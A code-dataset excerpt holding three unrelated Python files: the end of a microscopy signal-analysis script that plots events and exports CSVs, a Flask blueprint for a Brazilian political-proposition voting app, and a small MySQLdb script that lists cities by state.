of event area and intensity are plotted as colored lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page5 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n ax_1 = mask_page5.add_subplot(111, projection='3d',rasterized=True)\r\n ax_1.scatter3D(cents[:,2],cents[:,0],cents[:,1],c = area_colors) #here is the modified line\r\n ax_1.set_xlabel('x')\r\n ax_1.set_ylabel('time (s)')\r\n ax_1.set_zlabel('y')\r\n ax_1.set_title(\"Signal Centers Over Time\")\r\n ax_1.set_zlim(0,len(binary_gauss[0,1]))\r\n ax_1.set_xlim(0,len(binary_gauss[0,0]))\r\n #ax_1.set_facecolor('w')\r\n plt.gca().invert_zaxis()\r\n #ax_1.grid(b=None)\r\n #txt=\"Figure 5. 3D plot of events centroids over time. The center of each event over time is plotted as 3D lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page6 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n ax_2 = mask_page6.add_subplot(111, projection='3d', rasterized=True)\r\n #ax_2.plot3D(coords[:,2],coords[:,0],coords[:,1],linewidth = 0.1) #here si the modified line\r\n ax_2.scatter3D(coords[:,2],coords[:,0],coords[:,1], c = coords_colors) #here is the modified line\r\n ax_2.set_xlabel('x')\r\n ax_2.set_ylabel('time (s)')\r\n ax_2.set_zlabel('y')\r\n ax_2.set_title(\"Signals Over Time\")\r\n ax_2.set_zlim(0,len(binary_gauss[0,1]))\r\n ax_2.set_xlim(0,len(binary_gauss[0,0]))\r\n #ax_1.set_facecolor('w')\r\n plt.gca().invert_zaxis()\r\n #ax_1.grid(b=None)\r\n #txt=\"Figure 5. 3D plot of events centroids over time. The center of each event over time is plotted as 3D lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page7 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,1,1)\r\n plt.scatter(starts[:,2],starts[:,1],edgecolors='black',c = starts_colors) \r\n plt.ylim(0,len(binary_gauss[0,1]))\r\n plt.xlim(0,len(binary_gauss[0,0]))\r\n plt.gca().invert_yaxis()\r\n plt.title(\"Signal Origination Sites\")\r\n #txt=\"Figure 6. Event origination sites. The coordinates of the first frame of each event is shown as a colored scatter plot.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n #mask_page8 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #[plt.scatter(events[key][8][:,2],events[key][8][:,1]) for key in events]\r\n #plt.ylim(0,len(binary_gauss[0,1]))\r\n #plt.xlim(0,len(binary_gauss[0,0]))\r\n #plt.gca().invert_yaxis()\r\n #txt=\"\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n #pdf.savefig()\r\n #------------------------------------------\r\n # untouched half) \r\n #mask_page9 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #for key in events:\r\n # spectrum = np.real(np.fft.fft(events[key][4]))\r\n # frequencies = np.real(np.fft.fftfreq(len(spectrum)))\r\n # plt.plot(abs(frequencies),spectrum)\r\n # plt.ylim(0,1000)\r\n # plt.xlim(0,0.5)\r\n #plt.ylabel('Intensity')\r\n #plt.xlabel('Frequency')\r\n #plt.title(\"Signal Intensity Fourier Frequencies\")\r\n #pdf.savefig() \r\n #for key in events:\r\n # if(events[key][9].any()== True):\r\n # mask_page10 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n # plt.rcParams.update({'font.size': 12})\r\n # ax_3 = mask_page10.add_subplot(111, projection='3d') \r\n # ax_3.plot3D(events[key][8][:,2], events[key][8][:,0],events[key][8][:,1])\r\n # ax_3.set_xlabel('x')\r\n # ax_3.set_ylabel('time (s)')\r\n # ax_3.set_zlabel('y')\r\n # ax_3.set_title(\"Divergent/Convergent Signals\")\r\n # ax_3.set_zlim(0,len(binary_gauss[0,1]))\r\n # ax_3.set_xlim(0,len(binary_gauss[0,0]))\r\n # plt.gca().invert_zaxis()\r\n # pdf.savefig() \r\n # for key in events:\r\n # if(events[key][12] == True):\r\n # mask_page11 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n # plt.rcParams.update({'font.size': 12})\r\n # ax_4 = mask_page11.add_subplot(111, projection='3d') \r\n # ax_4.plot3D(events[key][8][:,2], events[key][8][:,0],events[key][8][:,1])\r\n # ax_4.set_xlabel('x')\r\n # ax_4.set_ylabel('time (s)')\r\n # ax_4.set_zlabel('y')\r\n # ax_4.set_title(\"Propagating Waves\")\r\n # ax_4.set_zlim(0,len(binary_gauss[0,1]))\r\n # ax_4.set_xlim(0,len(binary_gauss[0,0]))\r\n # plt.gca().invert_zaxis()\r\n #pdf.savefig() \r\n #mask_page13 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #plt.rcParams.update({'font.size': 12})\r\n #ax_5 = mask_page13.add_subplot(111, projection='3d') \r\n #ax_5.scatter3D(events[:,1], events[:,3],events[:,5],c = range(len(events[:,1])),s=80) \r\n #ax_5.set_xlabel('maximal area (um^2)')\r\n #ax_5.set_ylabel('duration (s)')\r\n #ax_5.set_zlabel('maximal intensity (f)')\r\n #ax_5.set_zlim(0,len(binary_gauss[0,1]))\r\n #ax_5.set_title(\"signal scatter\") \r\n #pdf.savefig() \r\n plt.close('all')\r\n return\r\ndef graphics_inter(sites, binary_gauss, sum_particle, sum_mask, mask):\r\n events = np.array(list(sites.values()),dtype=object)\r\n areas = np.concatenate(events[:,0]).ravel()\r\n amps = np.concatenate(events[:,4]).ravel()\r\n amps = amps.astype(int)\r\n \r\n cents = np.concatenate(events[:,2]).ravel()\r\n cents = cents.reshape(((len(cents)//3),3))\r\n \r\n boxes = np.concatenate(events[:,13]).ravel()\r\n boxes = boxes.reshape(((len(boxes)//4),4))\r\n \r\n box_offset = np.concatenate(events[:,14]).ravel()\r\n box_offset = box_offset.reshape(((len(box_offset)//4),4)) \r\n \r\n cents[:,1] = cents[:,1] + boxes[:,0]\r\n cents[:,2] = cents[:,2] + boxes[:,1]\r\n \r\n cors = np.array(events[:,8])\r\n coords = np.concatenate(cors).ravel()\r\n coords = coords.reshape(((len(coords)//3),3))\r\n \r\n coords[:,1] = coords[:,1] + box_offset[:,0]\r\n coords[:,2] = coords[:,2] + box_offset[:,1]\r\n \r\n # print(\"coords: \", coords)\r\n #print(\"len: \", len(coords))\r\n #print(\"cents: \", cents)\r\n #print(\"len: \", len(box_offset))\r\n\r\n starts = np.concatenate(events[:,7]).ravel()\r\n starts = starts.reshape(((len(starts)//3),3))\r\n #print(starts)\r\n start_offset = np.concatenate(events[:,15]).ravel()\r\n start_offset = start_offset.reshape(((len(start_offset)//4),4)) \r\n \r\n starts[:,1] = starts[:,1] + start_offset[:,0]\r\n starts[:,2] = starts[:,2] + start_offset[:,1]\r\n\r\n # create color maps so each event gets a distinct color\r\n event_colors = cm.tab20c(np.linspace(0, 1, len(events)))\r\n area_colors = []\r\n coords_colors = []\r\n coorz_colors = []\r\n starts_colors = []\r\n for i in range(len(events)):\r\n for x in events[i][0]:\r\n area_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coords_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coorz_colors.append(event_colors[i,0])\r\n for x in events[i][7]:\r\n starts_colors.append(event_colors[i])\r\n \r\n # normalize area_colors based on intensity\r\n max_amp = max(amps) \r\n min_amp = min(amps) - 5000\r\n norm_amps = (amps - min_amp) / (max_amp - min_amp)\r\n temp = np.array(area_colors).T\r\n temp = [temp[0],temp[1],temp[2],norm_amps]\r\n area_colors_norm = np.array(temp).T\r\n \r\n # normalize area_colors based on intensity\r\n max_dur = max(amps) \r\n min_dur = min(amps) - 5000\r\n norm_durs = (amps - min_dur) / (max_dur - min_dur)\r\n temp = np.array(area_colors).T\r\n temp = [temp[0],temp[1],temp[2],norm_durs]\r\n duration_colors_norm = np.array(temp).T\r\n\r\n \r\n #print(amps)\r\n #print(areas)\r\n mpl.style.use('tableau-colorblind10') \r\n pdf_file = temp_full_filename.replace('.tif','_report.pdf')\r\n with PdfPages(pdf_file) as pdf: \r\n #mask_page1 = plt.figure(figsize=(16, 9), dpi=300)\r\n #plt.rcParams.update({'font.size': 12})\r\n #plt.subplot(1,3,1)\r\n #plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,1])),events[:,1],edgecolors='black', c = event_colors) \r\n #plt.xlim(0.9,1.1)\r\n #plt.xticks([])\r\n #plt.ylabel('maximal area (pixel^2)')\r\n #plt.subplot(1,3,2)\r\n #plt.title(\"Signal Descriptors\")\r\n #plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,3])),events[:,3],edgecolors='black', c = event_colors)\r\n #plt.xlim(0.9,1.1)\r\n #plt.xticks([])\r\n #plt.ylabel('duration (frames)')\r\n #plt.subplot(1,3,3)\r\n #plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,5])),events[:,5],edgecolors='black', c = event_colors)\r\n #plt.xlim(0.9,1.1)\r\n #plt.xticks([])\r\n #plt.ylabel('maximal intensity (delta f)')\r\n #txt=\"Figure 1. Event parameter strip charts. Maximal area (u^2), total duration (s), and maximal intensity (f) are plotted as points.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n #pdf.savefig()\r\n mask_page2 = plt.figure(figsize=(11, 8.5), dpi=300) \r\n im2 = plt.imshow(sum_mask,cmap='magma', interpolation='gaussian')\r\n #plt.colorbar(im2)\r\n #plt.title(\"Signal Time Lapse\")\r\n #txt=\"Figure 2. Event masks. The filtered and summed image is shown overlayed with its particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig() \r\n #cb.remove()\r\n mask_page3 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,1,1)\r\n im1 = plt.imshow(sum_particle, cmap = 'inferno')\r\n cb = plt.colorbar(im1)\r\n plt.title(\"Signal Locations\")\r\n #txt=\"Figure 3. The particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page4 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.subplot(2,1,1)\r\n plt.scatter(cents[:,0],areas,edgecolors='black',linewidths=0.2, c = area_colors) \r\n #[plt.scatter(events[key][2][:,0],events[key][0],edgecolors='black',linewidths=0.2) for key in events]\r\n plt.title(\"Signal Time Course \")\r\n plt.ylabel('area (pixel^2)')\r\n plt.xlabel('time (frames)')\r\n #plt.ylim(0,np.max(events[:,1])+10)\r\n plt.xlim(0,len(binary_gauss))\r\n plt.subplot(2,1,2)\r\n plt.scatter(cents[:,0],amps,edgecolors='black',linewidths=0.2, c = area_colors) \r\n plt.ylabel('intensity (f)')\r\n plt.xlabel('time (frames)')\r\n #plt.ylim(0,300)\r\n plt.xlim(0,len(binary_gauss))\r\n #txt=\"Figure 4. Area and Intensity versus time plots. The time course of event area and intensity are plotted as colored lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n #mask_page5 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n #plt.rcParams.update({'font.size': 12})\r\n #ax_1 = mask_page5.add_subplot(111, projection='3d',rasterized=True)\r\n #ax_1.scatter3D(cents[:,2],cents[:,0],cents[:,1],c = area_colors) #here is the modified line\r\n #ax_1.set_xlabel('x')\r\n #ax_1.set_ylabel('time (frames)')\r\n #ax_1.set_zlabel('y')\r\n #ax_1.set_title(\"Signal Centers Over Time\")\r\n #ax_1.set_zlim(0,len(binary_gauss[0,1]))\r\n #ax_1.set_xlim(0,len(binary_gauss[0,0]))\r\n #ax_1.set_facecolor('w')\r\n #plt.gca().invert_zaxis()\r\n #ax_1.grid(b=None)\r\n #txt=\"Figure 5. 3D plot of events centroids over time. The center of each event over time is plotted as 3D lines.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n #pdf.savefig()\r\n \r\n plt.close('all')\r\n\r\n return\r\n\r\ndef pkl_to_csv(file_name, save_files):\r\n \r\n output_data_csv = file_name.replace('_raw.p','_data.csv')\r\n output_coords_csv = file_name.replace('_raw.p','_coords.csv')\r\n rois = pkl.load( open (file_name, \"rb\") ) \r\n rois = np.array(list(rois.values()),dtype=object)\r\n\r\n column_titles_data = ['ROI_ID','t_centroids [frame]','x_centroid [pixel]','y_centroid [pixel]','Area [pixel^2]','Amplitude',\r\n 'Starting Frame','Duration [frames]','Max Total Area','Max Amplitude','Converge/Diverge']\r\n column_titles_coords = ['ROI_ID', 't [frame]', 'x [pixel]', 'y [pixel]']\r\n\r\n all_rows = []\r\n all_coords = []\r\n \r\n all_rows.append(column_titles_data)\r\n all_coords.append(column_titles_coords)\r\n \r\n for i in range(len(rois)):\r\n \r\n for j in range(len(rois[i][2])):\r\n \r\n idx = str(i)\r\n t = str(int(rois[i][2][j][0]))\r\n box_offset = rois[i][13][j]\r\n y_c = str(int(rois[i][2][j][1]) + int(box_offset[0]))\r\n x_c = str(int(rois[i][2][j][2]) + int(box_offset[1]))\r\n area = str(rois[i][0][j])\r\n amp = str(int(rois[i][4][j]))\r\n if j == 0:\r\n sf = str(rois[i][6])\r\n duration = str(int(rois[i][3]))\r\n con_div = '0'\r\n if rois[i][9][0] != False or rois[i][9][1] != False:\r\n con_div = '1'\r\n max_amp = str(int(max([rois[i][4][x] for x in range(len(rois[i][2]))])))\r\n max_area = 0\r\n uniq_t = set([rois[i][2][x][0] for x in range(len(rois[i][2]))])\r\n for y in uniq_t:\r\n areas = [rois[i][0][x] for x in range(len(rois[i][0])) if rois[i][2][x][0] == y]\r\n sum_areas = np.sum(areas)\r\n if sum_areas > max_area:\r\n max_area = sum_areas\r\n max_area = str(max_area)\r\n\r\n csv_row = [idx, t, x_c, y_c, area, amp, sf, duration, max_area, max_amp, con_div]\r\n else:\r\n csv_row = [idx, t, x_c, y_c, area, amp]\r\n all_rows.append(csv_row)\r\n \r\n if save_files[1] == True:\r\n x_offset = rois[i][14][:,1]\r\n y_offset = rois[i][14][:,0]\r\n roi_ts = rois[i][8][:,0]\r\n roi_xs = rois[i][8][:,2] + x_offset\r\n roi_ys = rois[i][8][:,1] + y_offset\r\n roi_coords = [[str(i),roi_ts[j],roi_xs[j],roi_ys[j]] for j in range(len(roi_ts))]\r\n all_coords.extend(roi_coords)\r\n if save_files[0] == True:\r\n with open(output_data_csv, 'w', newline='') as csv_file:\r\n csvwriter = csv.writer(csv_file,delimiter=',')\r\n csvwriter.writerows(all_rows)\r\n \r\n if save_files[1] == True:\r\n with open(output_coords_csv, 'w', newline='') as csv_file:\r\n csvwriter = csv.writer(csv_file,delimiter=',')\r\n csvwriter.writerows(all_coords)\r\n \r\ndef get_s8_inputs():\r\n root = tk.Tk()\r\n root.title('S8 Menu ')\r\n \r\n def help_menu():\r\n os.system('gedit Info/help.txt')\r\n\r\n\r\n menubar = tk.Menu(root)\r\n f = tk.Menu(menubar, tearoff=1)\r\n #f.add_command(label='Help',command=help_menu)\r\n f.add_command(label='Quit',command=sys.exit)\r\n menubar.add_cascade(label='File',menu=f)\r\n root.config(menu=menubar)\r\n\r\n #root.geometry('400x200')\r\n print('\\n') \r\n def get_input_directory():\r\n global input_path\r\n input_path = filedialog.askdirectory(title='Select INPUT directory')\r\n print('Input directory set as: {0}'.format(input_path))\r\n return input_path\r\n def get_output_directory():\r\n global output_path\r\n output_path = filedialog.askdirectory(title='Select OUTPUT directory')\r\n print('Output directory set as: {0}'.format(output_path))\r\n\r\n\r\n tk.Label(root, text='(1) INPUT directory').grid(row=0, sticky=tk.W)\r\n tk.Button(root, text='Click here', \r\n command=get_input_directory).grid(row=1, sticky=tk.N, pady=6)\r\n tk.Label(root, text='(2) OUTPUT directory').grid(row=2, sticky=tk.W)\r\n tk.Button(root, text='Click here', \r\n command=get_output_directory).grid(row=3, sticky=tk.N, pady=6)\r\n\r\n tk.Label(root, text=\"(3) Use spatial smoothing:\").grid(row=4, sticky=tk.W)\r\n var_otsu = tk.BooleanVar(value=True)\r\n tk.Radiobutton(root, text='Yes', variable=var_otsu, value=True).grid(row=5,column=0,sticky=tk.W)\r\n tk.Radiobutton(root, text='No', variable=var_otsu, value=False).grid(row=5,column=1,sticky=tk.W)\r\n \r\n tk.Label(root, text=\"(4) Use temporal smoothing:\").grid(row=9, sticky=tk.W)\r\n var_savgol = tk.BooleanVar(value=True)\r\n tk.Radiobutton(root, text='Yes', variable=var_savgol, value=True).grid(row=10,column=0, sticky=tk.W)\r\n tk.Radiobutton(root, text='No', variable=var_savgol, value=False).grid(row=10,column=1,sticky=tk.W)\r\n\r\n tk.Label(root, text=\"(5) Use noise gate:\").grid(row=12, sticky=tk.W)\r\n var_gate = tk.BooleanVar(value=True)\r\n tk.Radiobutton(root, text='Yes', variable=var_gate, value=True).grid(row=13, column=0, sticky=tk.W)\r\n tk.Radiobutton(root, text='No', variable=var_gate, value=False).grid(row=13, column=1, sticky=tk.W)\r\n\r\n tk.Label(root, text=\"(6) Adaptive Threshold Method:\").grid(row=14,sticky=tk.W)\r\n options_list = [\"Otsu\",\"Triangle\",\"Yen\"]\r\n value_inside = tk.StringVar(root)\r\n value_inside.set(\"Otsu\")\r\n tk.OptionMenu(root,value_inside,*options_list).grid(row=15,column=0,sticky=tk.W)\r\n\r\n\r\n\r\n tk.Label(root, text=\"(7) Select csv files to save\").grid(row=16, sticky=tk.W)\r\n var1 = tk.BooleanVar(value=True)\r\n tk.Checkbutton(root, text='ROI Data file', variable=var1).grid(row=17,column=0, sticky=tk.W)\r\n var2 = tk.BooleanVar(value=False)\r\n tk.Checkbutton(root, text=\"Coordinate file\", variable=var2).grid(row=18,column=0, sticky=tk.W)\r\n\r\n #tk.Label(root, text=\"(8) Click submit\").grid(row=15, sticky=tk.W)\r\n tk.Button(root, text='Submit', command=root.destroy).grid(row=19, sticky=tk.N, pady=6)\r\n tk.mainloop()\r\n try:\r\n return input_path, output_path, var_otsu.get(), var_savgol.get(), var_gate.get(), value_inside.get(), var1.get(), var2.get()\r\n except:\r\n print('\\n')\r\n print('NO DIRECTORY SELECTED, TRY AGAIN')\r\n print('\\n')\r\n print('Terminal will close in:')\r\n for i in range(5,0,-1):\r\n print(i)\r\n time.sleep(1)\r\n print('Goodbye')\r\n sys.exit()\r\n \r\nprint('Welcome to the S8 signal processing code!')\r\nfolder_path, output_path, var_otsu, var_savgol, var_gate, value_inside, save_csv1, save_csv2 = get_s8_inputs()\r\nraw_path = output_path\r\nsave_csvs = [save_csv1, save_csv2]\r\nprint(save_csvs)\r\n\r\n#print(\"folder path:\", folder_path)\r\n#print(\"raw path:\", output_path)\r\nfor filename in os.listdir(folder_path):\r\n\r\n # Only select tif files in folder_path directory\r\n if filename.endswith('.tif') and os.path.isfile('{0}/{1}'.format(folder_path,filename)):\r\n print(\"\\n\" + filename)\r\n temp_full_filename = output_path + '/' + filename\r\n p_file = temp_full_filename.replace('.tif', '_raw.p')\r\n if os.path.isfile(p_file):\r\n continue\r\n\r\n images = TiffStack(folder_path +\"/\" +filename)\r\n yval = np.array(images)\r\n data_type = type(yval[0][0][0])\r\n print(\"val_inside:\", value_inside)\r\n #print(\"image ram:\", psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #--------------------------------------------------------------\r\n #Noise Filtering Module\r\n #----------------------------------------------------------------\r\n #yval = np.apply_along_axis(savitzky_golay,0,yval)\r\n \r\n if var_savgol:\r\n #win_size = 2 * int(len(yval) / 5) + 1\r\n win_size = 49\r\n yval = savgol_filter(yval,win_size,3,axis=0, mode ='mirror')\r\n yval = yval-np.amin(yval, axis = 0)\r\n #yval[yval < 0] = 0\r\n yval = np.array(yval, dtype=data_type) \r\n \r\n imsave(raw_path + '/' + filename + '_filtered_new.tif', yval) #save the filtered image\r\n #print(\"filtered ram:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #-------------------------------------------------------------------------------\r\n #Binarize\r\n #--------------------------------------------------------------------------------\r\n binary_gauss = adaptive_thresholding(yval,var_otsu, var_gate, value_inside)\r\n\r\n #print(\"binary ram:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #-------------------------------------------------------------------------------\r\n #Masking\r\n #----------------------------------------------------------------------------------\r\n mask = masker(binary_gauss, yval)\r\n \r\n #print(\"mask ram:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #----------------------------------------------------------------------------------\r\n # Summing\r\n #-------------------------------------------------------------------------------------\r\n sum_particle = particle_sum(binary_gauss)\r\n sum_mask = masker_sum(mask)\r\n #---------------------------------------------------------------------------------------------\r\n # Splitting\r\n #----------------------------------------------------------------------------------\r\n cropped_values = multicrop(sum_particle,binary_gauss,mask)\r\n \r\n #----------------------------------------------------------------------------------------\r\n #Event Tracking\r\n #-----------------------------------------------------------------------------------------------\r\n sites = {}\r\n tal = 0\r\n for k,v in cropped_values[0].items():\r\n trk = three_tracker(tal, k, v,cropped_values[1], raw_path)\r\n sites.update(trk[0])\r\n tal += trk[1]\r\n \r\n #print(\"events ram:\",psutil.virtual_memory()[3]/1000000000-start_ram) \r\n #print(\"time series analysis time:\", time.time() -t_start)\r\n #--------------------------------------------------\r\n #Write Dictionary\r\n #------------------------------------------------------------------------\r\n \r\n with open(p_file, \"wb\") as handle:\r\n pkl.dump(sites, handle, protocol=pkl.HIGHEST_PROTOCOL)\r\n #------------------------------------------------------------------------\r\n #Read Dictionary and make plots\r\n #-------------------------------------------------------------------\r\n #myDicts = pkl.load( open (raw_path + \"/\" +filename +\"_raw.p\", \"rb\") ) \r\n myDicts = pkl.load( open (p_file, 'rb'))\r\n if len(myDicts) != 0:\r\n \r\n graphics(myDicts, binary_gauss, sum_particle, sum_mask, mask)\r\n \r\n #if save_csvs[0] == True or save_csvs[1] == True:\r\n # pkl_to_csv(p_file, save_csvs)\r\n \r\n else:\r\n print('No sites found')\r\n \r\n print(\"graphics time:\",time.time() - t_start) \r\n \r\nif save_csvs[0] == True or save_csvs[1] == True:\r\n for f in os.listdir(output_path):\r\n full_f = output_path + '/' + f\r\n if full_f.endswith('.p'): \r\n pkl_to_csv(full_f, save_csvs)\r\n \r\nprint('\\n')\r\ninput('S8 has finished! Press enter to close terminal')\r\n","repo_name":"franccm/s8","sub_path":"S8_23.05.31_DF_exp.py","file_name":"S8_23.05.31_DF_exp.py","file_ext":"py","file_size_in_byte":41274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"30774376984","text":"# -*- coding: utf-8 -*- \r\nfrom datetime import datetime\r\nfrom sqlalchemy import func,update\r\nfrom flask import Blueprint, request, render_template, g,flash, Response, make_response, send_file, jsonify, session, redirect, url_for\r\nimport csv, sys, MySQLdb, os\r\nfrom os import environ\r\nimport datetime\r\n\r\nfrom pecbrasil import db\r\nfrom pecbrasil.liga.forms import LigaForm\r\nfrom pecbrasil.proposicao.forms import AvaliarForm\r\nfrom pecbrasil.proposicao.models import TimeVotacao,Proposicao,VotacaoCandidato\r\nfrom pecbrasil.liga.models import Liga,LigaPontos,LigaJogador\r\nfrom pecbrasil.politica.services import PoliticaServices\r\n\r\nmod = Blueprint('proposicao', __name__, url_prefix='/proposicao')\r\n \r\npoliticaServices = PoliticaServices() \r\n\r\n@mod.route('/votar///', methods=['GET', 'POST'])\r\ndef votar(proposicao=None,voto=None):\r\n if proposicao is not None:\r\n proposicaoObj = Proposicao.query.filter_by(id=proposicao).first() \r\n \r\n meuTime = politicaServices.meuTime(userId=g.user.id)\r\n \r\n if meuTime is not None and proposicaoObj is not None: \r\n timeVotacao = TimeVotacao( desc=liga_form.nome.data, \r\n data=datetime.datetime.now(), \r\n proposicao=proposicaoObj.id, \r\n time = meuTime.id,\r\n data_liga=datetime.datetime.now(), \r\n voto=voto)\r\n db.session.add(timeVotacao)\r\n db.session.commit()\r\n return render_template(\"liga/liga.html\",liga=liga)\r\n\r\n@mod.route('/avaliar/', methods=['GET', 'POST'])\r\ndef avaliar(proposicaoid=None):\r\n if g.user is None or not g.user.is_authenticated():\r\n flash('You need to be signed in for this.')\r\n return redirect(url_for('account.login'))\r\n proposicoes = Proposicao.query.filter_by(id=proposicaoid).first() \r\n meuForm = AvaliarForm(request.form)\r\n meuTime = politicaServices.meuTime(userId=g.user.id) \r\n if request.method == 'POST' and meuForm.validate_on_submit():\r\n timeVot = TimeVotacao.query.filter_by(time = meuTime.id, proposicao = proposicaoid).first()\r\n if timeVot is None:\r\n timeVot = TimeVotacao(desc=meuForm.desc.data, voto=meuForm.voto.data, data=datetime.datetime.now(), \\\r\n time = meuTime.id, proposicao = proposicaoid,necessidade=meuForm.necessidade.data) \r\n db.session.add(timeVot)\r\n else:\r\n timeVot.data=datetime.datetime.now()\r\n timeVot.necessidade=meuForm.necessidade.data\r\n timeVot.desc=meuForm.desc.data\r\n timeVot.voto=meuForm.voto.data\r\n \r\n db.session.commit()\r\n return verproposicao(proposicao_id=proposicaoid) \r\n return render_template(\"proposicao/avaliar.html\" , \\\r\n proposicaoid = proposicaoid,\r\n meuForm=meuForm,proposicoes=proposicoes)\r\n\r\n@mod.route('/listar/')\r\n@mod.route('/listar/')\r\n@mod.route('/listar//')\r\n@mod.route('/listar//')\r\n@mod.route('/listar///')\r\ndef proposicao(candidatura_id=None,partido_sigla=None,frame=None):\r\n # Proposicao\r\n proposicoes = politicaServices.proposicao(candidatura_id,partido_sigla)\r\n \r\n return render_template(\"proposicao/proposicaoList.html\", proposicoes = proposicoes, frame=frame)\r\n \r\n \r\n@mod.route('/ver/')\r\n@mod.route('/ver/')\r\n@mod.route('/ver//')\r\ndef verproposicao(proposicao_id=None):\r\n \r\n proposicoes = Proposicao.query.filter_by(id=proposicao_id).first()\r\n \r\n if proposicao_id is not None:\r\n return render_template(\"proposicao/proposicao.html\", proposicoes=proposicoes) \r\n \r\n\r\n@mod.route('/listarvotacao/')\r\n@mod.route('/listarvotacao/')\r\n@mod.route('/listarvotacao//')\r\n@mod.route('/listarvotacao//')\r\n@mod.route('/listarvotacao///')\r\ndef listarvotacao(candidatura_id=None,proposicao_id=None,frame=None):\r\n \r\n votacoes = politicaServices.votacao(proposicao_id,candidatura_id)\r\n \r\n return render_template(\"proposicao/votacaoList.html\", votacoes = votacoes, frame=frame)\r\n \r\n \r\n@mod.route('/votacao/')\r\n@mod.route('/votacao/')\r\n@mod.route('/votacao//')\r\ndef votacao(proposicao_id=None):\r\n \r\n votacoes = VotacaoCandidato.query.filter_by(proposicao=proposicao_id).first()\r\n \r\n if proposicao_id is not None:\r\n return render_template(\"proposicao/votacao.html\", votacoes=votacoes) \r\n \r\n@mod.route('/acao/')\r\n@mod.route('/acao/')\r\n@mod.route('/acao//')\r\n@mod.route('/acao///')\r\ndef acao(proposicao_id=None,candidatura_id=None,partido_id=None):\r\n \r\n dataInicio = request.args.get('inicio')\r\n frame = request.args.get('frame')\r\n #if dataInicio is None:\r\n # dataInicio= \"01/10/2010\"\r\n if proposicao_id:\r\n acoes = politicaServices.proposicaoacao(dataInicio,proposicao_id=proposicao_id,candidatura_id=candidatura_id,partido_sigla=partido_id)\r\n else:\r\n acoes = politicaServices.ultimasProposicaoacao()\r\n if len(acoes)>1:\r\n return render_template(\"proposicao/acaoList.html\", acoes=acoes,frame=frame) \r\n else:\r\n return render_template(\"proposicao/acao.html\", acoes=acoes,frame=frame) \r\n \r\n@mod.route('/novidades/')\r\n@mod.route('/novidades/')\r\n@mod.route('/novidades//')\r\n@mod.route('/novidades///')\r\ndef novidades(proposicao_id=None,candidatura_id=None,partido_id=None):\r\n \r\n dataInicio = request.args.get('inicio')\r\n frame = request.args.get('frame')\r\n #if dataInicio is None:\r\n # dataInicio= \"01/10/2010\"\r\n if proposicao_id:\r\n acoes = politicaServices.proposicaoacao(dataInicio,proposicao_id=proposicao_id,candidatura_id=candidatura_id,partido_sigla=partido_id)\r\n else:\r\n acoes = politicaServices.ultimasProposicaoacao()\r\n \r\n votacoes = politicaServices.ultimasProposicaovotacao()\r\n return render_template(\"proposicao/ultimasacoes.html\", acoes=acoes , votacoes=votacoes,frame=frame) \r\n\r\n","repo_name":"mariohmol/pecbrasil","sub_path":"pecbrasil/proposicao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"29594281884","text":"#!/usr/bin/python3\n\"\"\"\nThis is a module for mysqldb\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nif __name__ == '__main__':\n argv = sys.argv\n i = 0\n state_name = argv[4]\n\n if (len(argv) != 5):\n print(\"Usage: Arguments must be four!\")\n sys.exit(1)\n\n db = MySQLdb.connect(host='localhost', port=3306, user=argv[1],\n passwd=argv[2], db=argv[3])\n\n cur = db.cursor()\n cur.execute(\"SELECT cities.name\\\n FROM cities\\\n WHERE cities.state_id = (SELECT id\\\n FROM states\\\n WHERE name = %s)\\\n ORDER BY cities.id ASC\", (state_name,))\n cities = cur.fetchall()\n for rows in cities:\n for content in rows:\n if i in range(len(cities) - 1):\n print(content, end=', ')\n i += 1\n else:\n print(content)\n cur.close()\n 